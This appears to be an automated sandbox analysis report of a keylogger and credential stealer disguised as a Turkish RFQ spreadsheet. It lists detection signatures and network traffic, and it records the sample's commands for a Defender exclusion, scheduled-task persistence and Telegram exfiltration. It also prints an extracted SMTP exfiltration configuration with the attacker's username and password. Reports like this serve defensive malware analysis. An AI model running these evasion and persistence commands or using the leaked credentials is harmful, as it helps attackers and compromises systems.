1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x71e84:$s1: UnHook 0x2f06b:$s2: SetHook 0x71e8b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x71e93:$s3: CallNextHook 0x2f080:$s4: _hook 0x71ea0:$s4: _hook
1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70cc0:$a1: get_encryptedPassword 0xb3ae0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71248:$a2: get_encryptedUsername 0xb4068:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x70933:$a3: get_timePasswordChanged 0xb3753:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x70a4a:$a4: get_passwordField 0xb386a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70cd6:$a5: set_encryptedPassword 0xb3af6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x739f2:$a6: get_passwords 0xb6812:$a6: get_passwords 0x30d66:$a7: get_logins 0x73d86:$a7: get_logins 0xb6ba6:$a7: get_logins
1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x72084:$s1: UnHook 0xb4ea4:$s1: UnHook 0x2f06b:$s2: SetHook 0x7208b:$s2: SetHook 0xb4eab:$s2: SetHook 0x2f073:$s3: CallNextHook 0x72093:$s3: CallNextHook 0xb4eb3:$s3: CallNextHook 0x2f080:$s4: _hook 0x720a0:$s4: _hook 0xb4ec0:$s4: _hook
Click to see the 47 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe", ParentImage: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, ParentProcessId: 7064, ParentProcessName: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe", ProcessId: 2548, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qovDEn" /XML "C:\Users\user\AppData\Local\Temp\tmp8E5C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qovDEn" /XML "C:\Users\user\AppData\Local\Temp\tmp8E5C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\qovDEn.exe, ParentImage: C:\Users\user\AppData\Roaming\qovDEn.exe, ParentProcessId: 4068, ParentProcessName: qovDEn.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qovDEn" /XML "C:\Users\user\AppData\Local\Temp\tmp8E5C.tmp", ProcessId: 4820, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qovDEn" /XML "C:\Users\user\AppData\Local\Temp\tmp7EFB.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qovDEn" /XML "C:\Users\user\AppData\Local\Temp\tmp7EFB.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe", ParentImage: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, ParentProcessId: 7064, ParentProcessName: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qovDEn" /XML "C:\Users\user\AppData\Local\Temp\tmp7EFB.tmp", ProcessId: 6216, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe", ParentImage: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, ParentProcessId: 7064, ParentProcessName: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe", ProcessId: 2548, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qovDEn" /XML "C:\Users\user\AppData\Local\Temp\tmp7EFB.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qovDEn" /XML "C:\Users\user\AppData\Local\Temp\tmp7EFB.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe", ParentImage: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, ParentProcessId: 7064, ParentProcessName: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qovDEn" /XML "C:\Users\user\AppData\Local\Temp\tmp7EFB.tmp", ProcessId: 6216, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T11:05:23.880546+0200	2803305	3	Unknown Traffic	192.168.2.8	49712	188.114.97.3	443	TCP
2024-10-14T11:05:25.097785+0200	2803305	3	Unknown Traffic	192.168.2.8	49715	188.114.97.3	443	TCP
2024-10-14T11:05:26.321261+0200	2803305	3	Unknown Traffic	192.168.2.8	49720	188.114.97.3	443	TCP
2024-10-14T11:05:27.722330+0200	2803305	3	Unknown Traffic	192.168.2.8	49721	188.114.97.3	443	TCP
2024-10-14T11:05:31.427755+0200	2803305	3	Unknown Traffic	192.168.2.8	49732	188.114.97.3	443	TCP
2024-10-14T11:05:34.228411+0200	2803305	3	Unknown Traffic	192.168.2.8	49745	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T11:05:22.362721+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49710	158.101.44.242	80	TCP
2024-10-14T11:05:23.298818+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49710	158.101.44.242	80	TCP
2024-10-14T11:05:24.533245+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49714	158.101.44.242	80	TCP
2024-10-14T11:05:25.595532+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49716	158.101.44.242	80	TCP
2024-10-14T11:05:26.366641+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49716	158.101.44.242	80	TCP
2024-10-14T11:05:28.376952+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49724	158.101.44.242	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\qovDEn.exe

Avira: detection malicious, Label: HEUR/AGEN.1309294

Found malware configuration

Source: 0000000B.00000002.1597437802.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587", "Version": "4.4"}
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.raw.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\qovDEn.exe

ReversingLabs: Detection: 26%

Multi AV Scanner detection for submitted file

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

ReversingLabs: Detection: 26%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\qovDEn.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49711 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49719 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49754 version: TLS 1.2

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 4x nop then jmp 02E5F8E9h	10_2_02E5F631
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 4x nop then jmp 02E5FD41h	10_2_02E5FA8F
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 4x nop then jmp 06C30D0Dh	10_2_06C30B30
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 4x nop then jmp 06C31697h	10_2_06C30B30
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 4x nop then jmp 06C331E0h	10_2_06C32DC8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 4x nop then jmp 06C32C19h	10_2_06C32968
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 4x nop then jmp 06C3E959h	10_2_06C3E6B0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 4x nop then jmp 06C3E501h	10_2_06C3E258
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 4x nop then jmp 06C3E0A9h	10_2_06C3DE00
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 4x nop then jmp 06C3F661h	10_2_06C3F3B8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 4x nop then jmp 06C3F209h	10_2_06C3EF60
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 4x nop then jmp 06C3EDB1h	10_2_06C3EB08
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 4x nop then jmp 06C3D3A1h	10_2_06C3D0F8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 4x nop then jmp 06C3CF49h	10_2_06C3CCA0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_06C30040
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 4x nop then jmp 06C3FAB9h	10_2_06C3F810
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 4x nop then jmp 06C331E0h	10_2_06C32DC2
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 4x nop then jmp 06C3DC51h	10_2_06C3D9A8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 4x nop then jmp 06C3D7F9h	10_2_06C3D550
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 4x nop then jmp 06C331E0h	10_2_06C3310E
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Code function: 4x nop then jmp 057EF8E9h	15_2_057EF631
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Code function: 4x nop then jmp 057EFD41h	15_2_057EFA93

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 11.2.qovDEn.exe.4009a28.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.qovDEn.exe.3fc6a08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:390120%0D%0ADate%20and%20Time:%2014/10/2024%20/%2018:29:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20390120%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:390120%0D%0ADate%20and%20Time:%2014/10/2024%20/%2019:08:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20390120%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49724 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49714 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49716 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49710 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49712 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49715 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49745 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49720 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49721 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49732 -> 188.114.97.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49711 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49719 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
